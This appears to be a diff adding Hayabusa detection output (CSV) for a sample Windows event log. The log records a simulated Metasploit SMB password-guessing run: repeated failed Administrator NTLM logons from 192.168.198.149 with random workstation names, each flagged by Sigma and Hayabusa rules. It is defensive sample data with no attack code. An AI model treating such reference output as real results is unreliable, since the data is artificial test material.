+2016-09-20 01:50:18.847 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RX0GW7K5wdQJUx4Y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.888 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Xm7CpD5i735McsvS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.959 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bHxjZsnR25J47Ez8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.959 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: J1JWj91m79FyykH6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.999 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.043 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: h9i0GncOzpz5REWp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.043 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BODZRJ6G3xxw29VJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.085 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SJ2lq4piINfmI7Qe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.127 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NqDeXdOitJ3WY8w4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.167 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FnoHQf7QDxoI4tel  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.217 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FqkbgrtBa5VFxPry  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.261 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TMD57GtY15bfWBre  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.350 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: e3lT9UgWr82PcAjf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.350 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SpwhTfFlvvccnI5N  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.388 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 10CfKdnvWf4UVuME  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.539 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YYLMax3okIqntHM1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.539 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.602 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qk9TPAK51EdVORwY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.602 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aVKRUnNu2nGslW7P  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.670 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZJ2AYRLcMbMVixg6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.759 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6Sl9ucxM2Nu3xjNq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.759 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AFeBGB6qA7OaYV7l  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.801 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.837 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KLUEKG9CzQYsH3Vp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.837 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.875 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vVZ44YKdRYY59zaC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.875 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: umU8pDDZFvvUVsHY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.921 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Nn7rA0uRegtHgaF1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2dgiakCKweT4GUGD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.039 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kptipiLujNVePYfy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.039 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.091 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: plaXJ1rEGpU3SzV2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.091 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I4pALF2luLfg36GC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.132 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.173 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZLO4cufbFcRhRy8b  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.173 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.215 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: a845OfrFKxy31Yhg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.215 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QnPM7uhs8y4BaP6I  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7fW5FzQ4jbWDJxXc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.326 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: huKy3ruTPAlx94pI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.326 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: g78Kx7hkMuUGIoX1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.363 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: erSXtXvMi8Cg1PWw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.417 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VaqXgO2US87zoXLl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.462 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.501 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QHEfAfFuAR2pX3LO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.501 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4Owk2elGaC5DOm1U  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.543 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VXPynWzVNADN56a4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xwfwZ0hXFaFwqymH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.619 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QYlZwLsvrsuqUZ4q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.707 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pvGrzr30eVl5TGhA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.707 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.791 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tqdJcHWbdGcIIHBr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.791 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YDt69bIJ1yI6PXLg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.840 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WtE2uMuOe8QPAKOj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.879 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
